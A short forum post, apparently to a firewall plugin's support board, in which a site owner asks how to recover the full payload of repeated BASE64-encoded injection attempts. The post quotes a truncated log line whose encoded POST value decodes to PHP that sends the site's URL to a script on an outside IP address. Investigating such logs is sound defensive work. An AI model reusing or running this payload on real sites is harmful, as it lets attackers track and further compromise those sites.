Repeated BASE64 encode injection – possible to recover payload?
Hello, first of all thank you, for the great plugin. I noticed that lately Ninja Firewall reports many BASE64 encoded injection attempts like this one. POST /index.php – BASE64-encoded injection – [POST:d = JGQgPSBnZXRfY3VycmVudF9maWxlX3VybCgpOwoKZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly8xOTguMjQuMTY2LjIyMi9ydC5waHA/Zj1kb21zc3M1NSZkPSIuJGQpOwp2YXJfZHVtcChiYXNlNjRfZGVjb2RlKCJkMlZ5ZVhWNWFXdG5hbWhtZW1abmF…]
Is it possible to recover the complete payload from the logs? I would like to investigate it further. Thank you.
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